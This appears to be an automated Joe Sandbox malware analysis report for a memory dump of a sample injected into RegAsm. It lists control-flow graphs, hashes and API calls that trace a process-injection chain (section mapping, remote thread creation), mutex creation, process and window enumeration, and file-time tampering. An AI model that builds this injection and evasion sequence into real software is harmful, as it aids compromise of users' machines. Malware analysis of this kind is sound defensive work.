                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.465540582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Section$View$Create$DuplicateObject
                                                        • String ID:
                                                        • API String ID: 1546783058-0
                                                        • Opcode ID: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
                                                        • Instruction ID: cb32da509904316ed93400f6898fa9d135e0c3db95e2781c81c9f365a62fd76c
                                                        • Opcode Fuzzy Hash: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
                                                        • Instruction Fuzzy Hash: 8D617F71A00244FBEB219F91CC49FAF7BB8FF85B00F10412AF912BA1E4D6749A01DB65

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 95 4014e8 96 4014e0-4014e5 95->96 97 4014ec-401519 call 401164 95->97 96->97 103 40151b 97->103 104 40151e-401523 97->104 103->104 106 401529-40153a 104->106 107 40184d-401855 104->107 111 401540-401569 106->111 112 40184b 106->112 107->104 110 40185a-401883 107->110 120 401874-40187f 110->120 121 401886-4018a3 call 401164 110->121 111->112 119 40156f-401586 NtDuplicateObject 111->119 112->110 119->112 122 40158c-4015b0 NtCreateSection 119->122 120->121 124 4015b2-4015d3 NtMapViewOfSection 122->124 125 40160c-401632 NtCreateSection 122->125 124->125 127 4015d5-4015f1 NtMapViewOfSection 124->127 125->112 128 401638-40163c 125->128 127->125 131 4015f3-401609 127->131 128->112 132 401642-401663 NtMapViewOfSection 128->132 131->125 132->112 134 401669-401685 NtMapViewOfSection 132->134 134->112 136 40168b call 401690 134->136
                                                        APIs
                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.465540582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Section$View$Create$DuplicateObject
                                                        • String ID:
                                                        • API String ID: 1546783058-0
                                                        • Opcode ID: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
                                                        • Instruction ID: a9c2a09af8f6974916e8dbce0e9e74a1ab8539b6b4ce2c8be6c8dc9eb24f9302
                                                        • Opcode Fuzzy Hash: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
                                                        • Instruction Fuzzy Hash: 675127B5900245BBEB209F91CC48FABBBB8EF85B00F104169FA11BA2E5D6759941CB24

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 138 4014eb-401519 call 401164 143 40151b 138->143 144 40151e-401523 138->144 143->144 146 401529-40153a 144->146 147 40184d-401855 144->147 151 401540-401569 146->151 152 40184b 146->152 147->144 150 40185a-401883 147->150 160 401874-40187f 150->160 161 401886-4018a3 call 401164 150->161 151->152 159 40156f-401586 NtDuplicateObject 151->159 152->150 159->152 162 40158c-4015b0 NtCreateSection 159->162 160->161 164 4015b2-4015d3 NtMapViewOfSection 162->164 165 40160c-401632 NtCreateSection 162->165 164->165 167 4015d5-4015f1 NtMapViewOfSection 164->167 165->152 168 401638-40163c 165->168 167->165 171 4015f3-401609 167->171 168->152 172 401642-401663 NtMapViewOfSection 168->172 171->165 172->152 174 401669-401685 NtMapViewOfSection 172->174 174->152 176 40168b call 401690 174->176
                                                        APIs
                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.465540582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Section$View$Create$DuplicateObject
                                                        • String ID:
                                                        • API String ID: 1546783058-0
                                                        • Opcode ID: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
                                                        • Instruction ID: 9bfdfe9cbb785be4fdfd0dd6995845ce59af7eac5c2f91023a42677e7735ba1d
                                                        • Opcode Fuzzy Hash: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
                                                        • Instruction Fuzzy Hash: 9D5127B5900248BBEB209F91CC48FAFBBB8EF85B00F104159FA11BA2E5D6719905CB64

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 178 402f5d-402f81 179 4030b4-4030b9 178->179 180 402f87-402f9f 178->180 180->179 181 402fa5-402fb6 180->181 182 402fb8-402fc1 181->182 183 402fc6-402fd4 182->183 183->183 184 402fd6-402fdd 183->184 185 402fff-403006 184->185 186 402fdf-402ffe 184->186 187 403028-40302b 185->187 188 403008-403027 185->188 186->185 189 403034 187->189 190 40302d-403030 187->190 188->187 189->182 192 403036-40303b 189->192 190->189 191 403032 190->191 191->192 192->179 193 40303d-403040 192->193 193->179 194 403042-4030b1 RtlCreateUserThread NtTerminateProcess 193->194 194->179
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.465540582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CreateProcessTerminateThreadUser
                                                        • String ID:
                                                        • API String ID: 1921587553-0
                                                        • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                        • Instruction ID: 028c31f760cafe6bdfeacd3711728474bc178c938afdf01909161d150e4b5d3c
                                                        • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                        • Instruction Fuzzy Hash: 84416831228D094FD768EF5CA845762B7D5F798351F6643AAE809D3389EA34DC1183C6

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 195 4030bf-4030cf 196 4030d1-403109 195->196 197 403055-4030b1 RtlCreateUserThread NtTerminateProcess 195->197 201 403113-403118 196->201 202 40310b 196->202 198 4030b4-4030b9 197->198 203 40311a 201->203 204 40311f-403141 call 4011db 201->204 202->201 205 40310d-403110 202->205 203->204 206 40311c 203->206 211 403145 204->211 205->201 206->204 211->211
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.465540582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CreateProcessTerminateThreadUser
                                                        • String ID:
                                                        • API String ID: 1921587553-0
                                                        • Opcode ID: c30ac68ff69c2e5b18761fee067da9d71720b063899e47dfee2d3f0b6f1a7b91
                                                        • Instruction ID: 715d93b18a869b872d6bab68aa9d9aa25fe40f65b3c459de5f1da0bbea4f6161
                                                        • Opcode Fuzzy Hash: c30ac68ff69c2e5b18761fee067da9d71720b063899e47dfee2d3f0b6f1a7b91
                                                        • Instruction Fuzzy Hash: 222105309087448FE3549F7C98423A6BFE0EB4A311F6805AFD596DA2D2D33E5A46C787

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 212 4018c5-40190b call 401164 Sleep call 4013cc 222 40191a-401920 212->222 223 40190d-401915 call 4014bf 212->223 226 401931 222->226 227 401928-40192d 222->227 223->222 226->227 228 401934-40194f 226->228 227->228 233 401952-40195b call 401164 228->233 234 401948-40194b 228->234 234->233
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                          • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                          • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.465540582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                        • String ID: zOji
                                                        • API String ID: 4152845823-4118548424
                                                        • Opcode ID: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
                                                        • Instruction ID: 5008de21d6646d6a4101a84352d49cb2eeb815b2728bacd1896cd8e4e39b07a0
                                                        • Opcode Fuzzy Hash: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
                                                        • Instruction Fuzzy Hash: 46018BB2308205EBDB006E949C61EAE3658AB40724F308033F607780F1C67D8A13F31B

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 237 4018a6-4018c3 241 4018d4 237->241 242 4018c8-40190b call 401164 Sleep call 4013cc 237->242 241->242 252 40191a-401920 242->252 253 40190d-401915 call 4014bf 242->253 256 401931 252->256 257 401928-40192d 252->257 253->252 256->257 258 401934-40194f 256->258 257->258 263 401952-40195b call 401164 258->263 264 401948-40194b 258->264 264->263
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                          • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                          • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.465540582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                        • String ID:
                                                        • API String ID: 4152845823-0
                                                        • Opcode ID: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
                                                        • Instruction ID: ec7c9f9116aa5c3d7af92c99ccf4db412f3ff1557a2b92ce3f8b18b7d449fb36
                                                        • Opcode Fuzzy Hash: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
                                                        • Instruction Fuzzy Hash: 97016DB2308305EBE7006A959C51EBA3758AB41764F308133B607780F1957D9A17B36F

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 267 4018be-4018c3 271 4018d4 267->271 272 4018c8-40190b call 401164 Sleep call 4013cc 267->272 271->272 282 40191a-401920 272->282 283 40190d-401915 call 4014bf 272->283 286 401931 282->286 287 401928-40192d 282->287 283->282 286->287 288 401934-40194f 286->288 287->288 293 401952-40195b call 401164 288->293 294 401948-40194b 288->294 294->293
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                          • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                          • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.465540582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                        • String ID:
                                                        • API String ID: 4152845823-0
                                                        • Opcode ID: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
                                                        • Instruction ID: cc5cf84a4ac16d3ff6e0150408ab5a4d949569ac012fe2ee23f61dbe8ee8ec54
                                                        • Opcode Fuzzy Hash: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
                                                        • Instruction Fuzzy Hash: 70014CB2308205EBDB106A959C51EBE3659AB55714F308133B607784F1967D9B13F32B

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 297 4018b1-4018b3 298 401903-40190b call 4013cc 297->298 299 4018b5-4018c3 297->299 305 40191a-401920 298->305 306 40190d-401915 call 4014bf 298->306 303 4018d4 299->303 304 4018c8-401900 call 401164 Sleep 299->304 303->304 304->298 312 401931 305->312 313 401928-40192d 305->313 306->305 312->313 316 401934-40194f 312->316 313->316 322 401952-40195b call 401164 316->322 323 401948-40194b 316->323 323->322
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.465540582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        • Opcode ID: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
                                                        • Instruction ID: ef1b3772686a797e33556ea01ceab6b668eb93d7b49977ee198856b5a882b22d
                                                        • Opcode Fuzzy Hash: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
                                                        • Instruction Fuzzy Hash: 210125B2208245EADB006A959C61EBA3799AB41724F308137F607790F1967E8A13F31B

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 326 4018c2-40190b call 401164 Sleep call 4013cc 338 40191a-401920 326->338 339 40190d-401915 call 4014bf 326->339 342 401931 338->342 343 401928-40192d 338->343 339->338 342->343 344 401934-40194f 342->344 343->344 349 401952-40195b call 401164 344->349 350 401948-40194b 344->350 350->349
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                          • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                          • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.465540582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                        • String ID:
                                                        • API String ID: 4152845823-0
                                                        • Opcode ID: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
                                                        • Instruction ID: d3c1b2561fc0583f1f6bbc3edf5ccb050f557452f45edf8007d0f6b78c0567ac
                                                        • Opcode Fuzzy Hash: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
                                                        • Instruction Fuzzy Hash: 14017CB2308205EBDB006A919C51EBE3759AB41724F308133F607780F1967D8A13F31B

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 353 4018da-40190b call 401164 Sleep call 4013cc 360 40191a-401920 353->360 361 40190d-401915 call 4014bf 353->361 364 401931 360->364 365 401928-40192d 360->365 361->360 364->365 366 401934-40194f 364->366 365->366 371 401952-40195b call 401164 366->371 372 401948-40194b 366->372 372->371
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                          • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                          • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.465540582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                        • String ID:
                                                        • API String ID: 4152845823-0
                                                        • Opcode ID: fbcf8db84f0bcb0a2d0b0e49b2c778a116fa09cd0714ede85e20fc239748f007
                                                        • Instruction ID: 8f9a98739febab8b32419077b991bda00f1387bd451c7178a571841fb0c6b49c
                                                        • Opcode Fuzzy Hash: fbcf8db84f0bcb0a2d0b0e49b2c778a116fa09cd0714ede85e20fc239748f007
                                                        • Instruction Fuzzy Hash: A8F044B6204205EBDB006E959C51FAE3768AB44725F344133F612790F1C67D8A52F71B
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.465540582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0ca61c8018c0a92d9c47960c8869f6ae9879eee7af7abece23f5b02bc0f6b44b
                                                        • Instruction ID: bba3d7a2d35b1bac795e561228ef48774c5d44a60f6fc9f6eb57bbafda88b283
                                                        • Opcode Fuzzy Hash: 0ca61c8018c0a92d9c47960c8869f6ae9879eee7af7abece23f5b02bc0f6b44b
                                                        • Instruction Fuzzy Hash: 7E41E131009BD54FDB138F74996619A7F64FE23721B1902EFC4919B2E3C7394A0AC79A
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.465540582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c7860815ad4231e939db7468cf30c1f9d63862ef5de29645b67a78e94f400ad0
                                                        • Instruction ID: 407047d8813846ed623c6620c5c661c30d6a874651c06bbb2e7ade0d14a7dce7
                                                        • Opcode Fuzzy Hash: c7860815ad4231e939db7468cf30c1f9d63862ef5de29645b67a78e94f400ad0
                                                        • Instruction Fuzzy Hash: 92117D2020C541FCD321D27CCA0C911BFA99B4F72075401FBD691250C3DAB9094AEBAB
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.465540582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 62f82913357ed83049cd1887261115a72de1e32be9748c9b7b11558f6f6d0137
                                                        • Instruction ID: 5db6927ec116302fd1a3f9be718c7712ee400501de5b38768fcc91fc62191cbb
                                                        • Opcode Fuzzy Hash: 62f82913357ed83049cd1887261115a72de1e32be9748c9b7b11558f6f6d0137
                                                        • Instruction Fuzzy Hash: 56117D2024C581ECD321D37CCA48914BFA69B4F72076801FBD691694C3CAB9454AEBAB
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.465540582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 039acd9b67e764601ba82469f9de9df4a99d24579219de54cf11ac1d4119bc91
                                                        • Instruction ID: 863a443b315763638c31dffea77139fa9fc7248c2f9879795720f54bbf800da4
                                                        • Opcode Fuzzy Hash: 039acd9b67e764601ba82469f9de9df4a99d24579219de54cf11ac1d4119bc91
                                                        • Instruction Fuzzy Hash: 4F115C2020C941ADD321D37CCA08914BFA59B4F72075802FBD6915A0C6CA79454AEF97
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.465540582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3e540363add078f276303d02989b505c159875bf8d0edc9c9c36215123116058
                                                        • Instruction ID: 0c8bb5551e2abd97a64ae9c19d193427848800bdc9eaee9e975189e24a5225cd
                                                        • Opcode Fuzzy Hash: 3e540363add078f276303d02989b505c159875bf8d0edc9c9c36215123116058
                                                        • Instruction Fuzzy Hash: 56112C2020C581EDD321D27CCA09514BF959B4F72475801FBD691690C6DA79454AEB9B
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.465540582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 25919fc75364af992eb4b4042875d07686e0c12065a18c89e44093fc2b7c95b2
                                                        • Instruction ID: f976abf0b506ce6ff8f37bbd7c8af7624669eab2ab4b5b0fb9c0d747e7254d45
                                                        • Opcode Fuzzy Hash: 25919fc75364af992eb4b4042875d07686e0c12065a18c89e44093fc2b7c95b2
                                                        • Instruction Fuzzy Hash: 1601472124C991BCE331E33CC908904BFE69B4FB6475802FAD2A15A0C7DA214589DFE7
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.465540582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f4027c6423f46035466e643bdd863a4de9ba613b5b2dc0b913ca9580a9ba2c0d
                                                        • Instruction ID: c5c43ab6752ee8d18fcb74b59ff98ad39f6596117cd62c5b2c77ced72334e6aa
                                                        • Opcode Fuzzy Hash: f4027c6423f46035466e643bdd863a4de9ba613b5b2dc0b913ca9580a9ba2c0d
                                                        • Instruction Fuzzy Hash: B111E2321002609FDF21AF24C49569AFBB2FF4530C375A188C9969B111E722AD8FCB91
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.465540582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1e7a0acffb87ace860446896612c735c16b272113d31e621940bc7827f3f290d
                                                        • Instruction ID: c48700b05c06e988df87cd580ca5e4308363d13747befdac9a33251d9afddee9
                                                        • Opcode Fuzzy Hash: 1e7a0acffb87ace860446896612c735c16b272113d31e621940bc7827f3f290d
                                                        • Instruction Fuzzy Hash: 8EF0227101036187CF18AB389498198BBA1EE46668798079EDDA2770D2E327A4A9CB90

                                                        Execution Graph

                                                        Execution Coverage:57.5%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:11.2%
                                                        Total number of Nodes:152
                                                        Total number of Limit Nodes:8
                                                        execution_graph 1129 2801953 1132 2801980 1129->1132 1142 28019d0 1132->1142 1135 2801973 1136 280199b SleepEx 1136->1136 1137 28019ab 1136->1137 1150 28021c4 1137->1150 1144 2801a07 1142->1144 1143 2801992 1143->1135 1143->1136 1144->1143 1145 2801ad0 RtlCreateHeap 1144->1145 1146 2801b01 1145->1146 1147 2801b0c LoadLibraryA 1146->1147 1148 2801b3b 1146->1148 1147->1143 1147->1146 1148->1143 1149 2801c80 CreateThread CloseHandle CreateThread CloseHandle 1148->1149 1149->1143 1168 2803cd0 1149->1168 1171 2803bf4 1149->1171 1151 28021e2 1150->1151 1179 2804a40 1151->1179 1153 28019c0 1154 2801d8c 1153->1154 1185 2804c90 1154->1185 1156 2801dc7 1157 2801df8 CreateMutexExA 1156->1157 1158 2801e12 1157->1158 1191 2804e00 1158->1191 1160 2801e51 1198 2801f04 1160->1198 1165 2801ebe 1166 2801ee9 SleepEx 1165->1166 1210 280226c 1165->1210 1216 2802cd0 1165->1216 1166->1165 1166->1166 1169 2803ce2 EnumWindows SleepEx 1168->1169 1170 2803d06 1168->1170 1169->1169 1169->1170 1172 2803c11 CreateToolhelp32Snapshot 1171->1172 1173 2803cab 1171->1173 1174 2803c93 SleepEx 1172->1174 1175 2803c25 Process32First 1172->1175 1174->1172 1174->1173 1177 2803c3d 1175->1177 1176 2803c8a CloseHandle 1176->1174 1177->1176 1178 2803c78 Process32Next 1177->1178 1178->1177 1180 2804a69 1179->1180 1181 2804a7d GetTokenInformation 1180->1181 1184 2804ada 1180->1184 1182 2804aa8 1181->1182 1183 2804ab2 GetTokenInformation 1182->1183 1183->1184 1184->1153 1186 2804cbd GetVolumeInformationA 1185->1186 1188 2804d10 1186->1188 1224 2805174 CryptAcquireContextA 1188->1224 1190 2804d50 1190->1156 1226 2804f1c 1191->1226 1193 2804e22 RegOpenKeyExA 1194 2804eb6 1193->1194 1197 2804e4f 1193->1197 1195 2804ede ObtainUserAgentString 1194->1195 1195->1160 1196 2804e63 RegQueryValueExA 1196->1197 1197->1194 1197->1196 1200 2801f27 1198->1200 1199 2801e7d CreateFileMappingA 1199->1165 1200->1199 1201 280203e 1200->1201 1202 2801f8b DeleteFileW CopyFileW 1200->1202 1228 2803490 1201->1228 1202->1199 1203 2801fab DeleteFileW 1202->1203 1206 2801fc1 1203->1206 1205 280205b CreateFileW 1205->1199 1207 2801ff6 DeleteFileW 1206->1207 1208 280200a 1207->1208 1234 2804920 1208->1234 1211 280229d 1210->1211 1241 28032ec CreateFileW 1211->1241 1213 28022b2 1245 280230c 1213->1245 1215 28022c3 1215->1165 1217 28032ec 2 API calls 1216->1217 1218 2802cf3 1217->1218 1219 2802f55 1218->1219 1220 2802f34 SleepEx 1218->1220 1223 2802efa ResumeThread 1218->1223 1285 2804578 1218->1285 1289 2802fac 1218->1289 1219->1165 1220->1218 1220->1219 1223->1218 1225 28051b9 1224->1225 1225->1190 1227 2804f4c 1226->1227 1227->1193 1229 28034b1 1228->1229 1230 28034d1 GetUserNameW 1229->1230 1231 28034f2 1230->1231 1239 28035e8 CoCreateInstance 1231->1239 1233 280350d 1233->1205 1235 2804947 1234->1235 1236 2804967 SetFileAttributesW CreateFileW 1235->1236 1237 28049b2 SetFileTime 1236->1237 1238 28049d3 1237->1238 1238->1201 1240 2803646 1239->1240 1242 2803341 1241->1242 1244 280338f 1241->1244 1243 2803360 ReadFile 1242->1243 1242->1244 1243->1244 1244->1213 1269 2803de0 1245->1269 1247 28026b8 1247->1215 1248 28025b8 1252 28026f9 1248->1252 1261 2802657 1248->1261 1265 28025d0 1248->1265 1249 280279d 1250 2803de0 2 API calls 1249->1250 1254 28027c4 1250->1254 1251 280235f 1251->1247 1255 28024df DeleteFileW CreateFileW 1251->1255 1257 2802594 1251->1257 1253 2803de0 2 API calls 1252->1253 1258 2802720 1253->1258 1254->1247 1256 2802840 2 API calls 1254->1256 1255->1257 1263 2802522 1255->1263 1256->1247 1257->1248 1257->1249 1258->1247 1260 2802840 2 API calls 1258->1260 1259 2803de0 2 API calls 1259->1265 1260->1247 1261->1247 1262 2803de0 2 API calls 1261->1262 1262->1247 1264 280255b WriteFile 1263->1264 1267 2802582 1264->1267 1265->1247 1265->1259 1265->1261 1273 2802840 1265->1273 1268 2804920 3 API calls 1267->1268 1268->1257 1270 2803e0f 1269->1270 1279 2803f7c 1270->1279 1272 2803f2f 1272->1251 1274 2802c63 1273->1274 1275 2802849 1273->1275 1274->1265 1276 2803f7c 2 API calls 1275->1276 1278 2802948 1275->1278 